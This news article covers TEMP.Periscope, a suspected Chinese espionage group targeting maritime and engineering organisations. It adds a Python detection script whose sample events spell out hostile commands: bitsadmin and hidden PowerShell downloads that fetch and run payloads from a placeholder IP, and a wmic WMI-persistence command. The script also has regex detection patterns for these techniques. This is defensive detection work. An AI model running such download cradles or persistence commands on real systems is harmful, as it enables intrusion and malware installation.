A suspected Chinese-linked cyber espionage group dubbed TEMP.Periscope has been targeting the engineering and maritime industries. FireEye has tracked the group since 2013 and has observed a spike in its activity since early 2018.
According to FireEye, the threat actors have sharply escalated attacks this year on engineering and maritime organizations connected to South China Sea issues. Other security firms track the same group under the name “Leviathan”.
TEMP.Periscope uses a revised toolkit drawn from a relatively large library of malware that it shares with multiple other suspected Chinese groups. Malicious tools observed include AIRBREAK, BADFLICK, PHOTO, HOMEFRY, LUNCHMONEY, MURKYTOP and China Chopper.
The group's tactics, techniques and procedures (TTPs) include targeted spear-phishing sent from compromised email accounts, and exploitation of the Microsoft Office Equation Editor memory corruption vulnerability CVE-2017-11882 to drop malware on target systems. Microsoft patched that vulnerability in November 2017, so its continued use depends on victims running unpatched Office installations.
The campaign also abuses the built-in bitsadmin.exe utility and PowerShell to download additional tools, and uses Windows Management Instrumentation (WMI) for persistence.
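As an added example, not code from FireEye's report or from this article, the following Python sketches host-based detection logic for the tradecraft named in the two preceding paragraphs: a child process spawned by Equation Editor (the usual post-exploitation sign of CVE-2017-11882), bitsadmin.exe and PowerShell download cradles, and WMI event-subscription persistence. The input events are constructed for this example; their field names follow Sysmon Event ID 1 (Image, ParentImage, CommandLine), and the IP addresses, job names and file paths are made up.

```python
"""Process-creation detections for the TEMP.Periscope TTPs described above.

Added example; not FireEye's or the article's code. Events are dictionaries
shaped like Sysmon Event ID 1 records, and every sample below is constructed.
"""
import ntpath
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List

Event = Dict[str, str]


@dataclass(frozen=True)
class Hit:
    rule: str
    command_line: str


# Loose, case-insensitive patterns: operators vary argument order and casing.
BITSADMIN_DOWNLOAD = re.compile(
    r"\bbitsadmin(?:\.exe)?\b.*?/(?:transfer|addfile)\b.*?https?://", re.I | re.S)
PS_DOWNLOAD_CRADLE = re.compile(
    r"\b(?:DownloadString|DownloadFile|DownloadData|Invoke-WebRequest|"
    r"Start-BitsTransfer|Net\.WebClient|WebRequest)\b", re.I)
WMI_SUBSCRIPTION = re.compile(
    r"(?:root\\subscription|__EventFilter|__FilterToConsumerBinding|"
    r"CommandLineEventConsumer|ActiveScriptEventConsumer|Register-WmiEvent)", re.I)

# Constructed Sysmon-style events (TEST-NET-2 addresses, invented paths).
SAMPLE_EVENTS: List[Event] = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "CommandLine": r"cmd.exe /c bitsadmin /transfer job1 /download /priority high "
                    r"http://198.51.100.7/update.bin %TEMP%\update.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient)"
                    r".DownloadString('http://198.51.100.7/s.ps1')"},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer '
                    r'CREATE Name="updater", ExecutablePath="C:\Users\Public\update.exe"'},
    {"Image": r"C:\Windows\System32\svchost.exe",            # benign control
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs"},
]


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path; ntpath works on any host OS."""
    return ntpath.basename(path).lower()


def classify(event: Event) -> List[str]:
    """Return the names of every rule the event triggers ([] when benign)."""
    image = _basename(event.get("Image", ""))
    parent = _basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    rules: List[str] = []
    # Equation Editor has no legitimate reason to launch child processes; a child
    # of EQNEDT32.EXE is the common post-exploitation sign of CVE-2017-11882.
    if parent == "eqnedt32.exe":
        rules.append("eqnedt32_child_process")
    # bitsadmin.exe fetching a payload over HTTP(S), even when wrapped in cmd /c.
    if BITSADMIN_DOWNLOAD.search(cmd):
        rules.append("bitsadmin_download")
    # PowerShell download cradles (WebClient, Invoke-WebRequest, BITS cmdlets).
    if (image == "powershell.exe" or "powershell" in cmd.lower()) \
            and PS_DOWNLOAD_CRADLE.search(cmd):
        rules.append("powershell_download_cradle")
    # Permanent WMI event subscriptions created from the command line.
    if WMI_SUBSCRIPTION.search(cmd):
        rules.append("wmi_event_subscription")
    return rules


def detect(events: Iterable[Event]) -> List[Hit]:
    """Run every rule over every event and collect the hits."""
    return [Hit(rule, ev.get("CommandLine", ""))
            for ev in events for rule in classify(ev)]


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(f"[{hit.rule}] {hit.command_line}")
```

Two caveats when turning this into production detections: PowerShell download cradles also appear in legitimate administration scripts, so that rule needs allow-listing by parent process or signed script rather than firing on its own; and command-line matching only catches WMI persistence created with wmic or PowerShell, so enumerate the __EventFilter, __EventConsumer and __FilterToConsumerBinding classes in root\subscription on each host as well, since the same subscription can be created through a compiled MOF file or direct COM calls with no tell-tale command line.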
The current TEMP.Periscope activity “likely reflects a concerted effort to target sectors that may yield information that could provide an economic advantage, research and development data, intellectual property, or an edge in commercial negotiations,” FireEye said in the report.